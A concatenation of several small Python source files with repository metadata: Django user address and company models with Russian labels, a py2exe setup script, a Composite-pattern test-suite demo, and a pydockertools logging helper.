    title = models.CharField(u'Название', max_length=255)
    def __unicode__(self):
        # Human-readable label for admin/related widgets.
        return self.title
class Address(models.Model):
    """Delivery address belonging to a User (a user may keep several)."""
    user = models.ForeignKey(User, related_name='addresses')
    city = models.CharField(u'Город', max_length=255, blank=True)
    postal_code = models.CharField(u'Индекс', max_length=6, blank=True)
    street = models.CharField(u'Улица', max_length=255, blank=True)
    house = models.CharField(u'Дом, корпус, строение', max_length=255, blank=True)
    flat = models.CharField(u'Квартира, офис', max_length=255, blank=True)
    # Free-form address imported from the legacy site, kept verbatim.
    original_string = models.TextField(u'Адрес со старого сайта', blank=True)
    email = models.EmailField(blank=True)
    phone = models.CharField(u'Контактный телефон', max_length=255, blank=True)
    courier_city = models.ForeignKey('checkout.CourierCity', null=True, blank=True)
    receiver_title = models.CharField(u'ФИО получателя', max_length=255)
    receiver_phone = models.CharField(u'Телефон получателя', max_length=255, blank=True)
    # Soft-delete flag; rows are flagged rather than removed.
    is_deleted = models.BooleanField(u'Удален', default=False)
    class Meta:
        verbose_name = u'адрес'
        verbose_name_plural = u'адреса'
    def __unicode__(self):
        # Comma-join only the non-empty address components.
        bits = [self.postal_code, self.city, self.street, self.house, self.flat]
        return u', '.join([x for x in bits if x])
class Company(models.Model):
    """Legal-entity details attached one-to-one to a User."""
    user = models.OneToOneField(User, related_name='company')
    title = models.CharField(u'Название', max_length=255, blank=True)
    city = models.CharField(u'Город', max_length=255, blank=True)
    industry = models.CharField(u'Занятия', max_length=255, blank=True)
    inn = models.CharField(u'ИНН/КПП', max_length=25, blank=True)
    ogrn = models.CharField(u'ОГРН', max_length=15, blank=True)
    giro = models.CharField(u'Расчетный счет', max_length=25, blank=True)
    juridical_address = models.TextField(u'Юридический адрес', blank=True)
    post_address = models.TextField(u'Почтовый адрес', blank=True)
    # Fix: ``phone`` was declared twice; this later declaration silently
    # shadowed an earlier required one (max_length=255, no blank=True), so
    # only this definition ever reached Django. The dead duplicate is removed;
    # effective schema and field order are unchanged.
    phone = models.CharField(u'Телефон', max_length=255, blank=True)
    director = models.CharField(u'Контактное лицо', max_length=255)
    class Meta:
        verbose_name = u'компания'
        # NOTE(review): plural repeats the singular form (u'компания');
        # likely intended u'компании' — confirm with site copy before changing.
        verbose_name_plural = u'компания'
    def __unicode__(self):
        return self.title
| {
"content_hash": "204267273aa7c72ae05e5252bce1f3d6",
"timestamp": "",
"source": "github",
"line_count": 142,
"max_line_length": 102,
"avg_line_length": 33.58450704225352,
"alnum_prop": 0.6777102117844411,
"repo_name": "Lisaveta-K/lisaveta-k.github.io",
"id": "ca65cdecfd79061030b3ae54ab25915efd4a5243",
"size": "5194",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "_site/tomat/apps/users/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "159937"
},
{
"name": "HTML",
"bytes": "275262"
},
{
"name": "JavaScript",
"bytes": "34638"
},
{
"name": "Python",
"bytes": "664204"
}
],
"symlink_target": ""
} |
from distutils.core import setup
import py2exe
# Build a standalone Windows executable from a Python script with py2exe.
# Usage: python setup.py py2exe
setup(console=['passcodes.py'])  # 'console' lists console entry-point scripts
| {
"content_hash": "c9891b6e2f8c0afe5ab97fc6203c07a5",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 54,
"avg_line_length": 26.428571428571427,
"alnum_prop": 0.7405405405405405,
"repo_name": "fatty-duck/lib-lockdown",
"id": "4f426d4f2491a54307bad1254111f71b22d9837f",
"size": "185",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "2917"
}
],
"symlink_target": ""
} |
class Test(object):
    """Component interface of the Composite pattern: leaves (TestCase) and
    containers (TestSuite) both expose run() and add()."""
    def run(self):
        """Execute the test; concrete components must override."""
        raise NotImplementedError("Implement this!")
    def add(self, test):
        """Add a child component; no-op default so leaves may ignore it."""
        pass
class TestCase(Test):
    """Leaf component: a single runnable test."""
    def run(self):
        # Fix: the original bare ``print`` statement is Python-2-only syntax;
        # the parenthesized form behaves identically on Python 2 and 3.
        print("Running test: %s" % self)
class TestSuite(Test):
    """Composite component: holds children (leaves or nested suites) and
    runs them in insertion order."""
    def __init__(self):
        self.tests = []
    def run(self):
        """Delegate run() to every registered child, in order."""
        for child in self.tests:
            child.run()
    def add(self, test):
        """Register a child component for later execution."""
        self.tests.append(test)
def test():
    """Demo: build a small composite tree of suites and cases, then run it."""
    leaf_a, leaf_b, leaf_c = TestCase(), TestCase(), TestCase()
    suite_a, suite_b, root = TestSuite(), TestSuite(), TestSuite()
    # First suite holds two leaves, second suite holds one.
    suite_a.add(leaf_a)
    suite_a.add(leaf_b)
    suite_b.add(leaf_c)
    # Root nests both suites and reuses one leaf directly.
    root.add(suite_a)
    root.add(suite_b)
    root.add(leaf_a)
    root.run()
if __name__ == '__main__':
    # Run the composite-pattern demo when executed as a script.
    test()
| {
"content_hash": "981f8d600f6c5f44290da8539e8a05cb",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 52,
"avg_line_length": 18.622222222222224,
"alnum_prop": 0.5978520286396182,
"repo_name": "pgularski/snippets",
"id": "ba8bb877d00153b6aa7559d470715f1b4c054357",
"size": "896",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python/design_patterns/composite.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "67595"
}
],
"symlink_target": ""
} |
import logging
from registry import registry_connect
# Package metadata.
__author__ = 'Joji Vithayathil Johny'
__version__ = '0.0.1'
def set_logger_status(name='pydockertools', level=logging.DEBUG, format_string=None):
    """
    Attach a stream handler at the given level to the named logger.

    By default, this logs all pydockertools messages to ``stdout``.

    >>> import pydockertools
    >>> pydockertools.set_logger_status('pydockertools.resources', logging.INFO)

    Fix: the docstring previously advertised a nonexistent
    ``set_stream_logger`` function in its example.

    NOTE(review): each call adds a new handler; calling this repeatedly for
    the same ``name`` duplicates log output — confirm whether dedup is wanted.

    :type name: string
    :param name: Log name
    :type level: int
    :param level: Logging level, e.g. ``logging.INFO``
    :type format_string: str
    :param format_string: Log message format
    """
    if format_string is None:
        format_string = "%(asctime)s %(name)s [%(levelname)s] %(message)s"
    logger = logging.getLogger(name)
    logger.setLevel(level)
    handler = logging.StreamHandler()
    handler.setLevel(level)
    handler.setFormatter(logging.Formatter(format_string))
    logger.addHandler(handler)
def joke():
    """Return the canonical placeholder joke text (Monty Python's
    "funniest joke in the world")."""
    punchline = (
        u'Wenn ist das Nunstfcck git und Slotermeyer? Ja! ... '
        u'Beiherhund das Oder die Flipperwaldt gersput.'
    )
    return punchline
| {
"content_hash": "ecb564881597e63258d06426b145a487",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 85,
"avg_line_length": 33.6,
"alnum_prop": 0.6811224489795918,
"repo_name": "jojees/pydocker-tools",
"id": "b0f6c39dbffa2b0c624266e0bb92b89739a8194e",
"size": "2312",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pydockertools/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "14824"
}
],
"symlink_target": ""
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.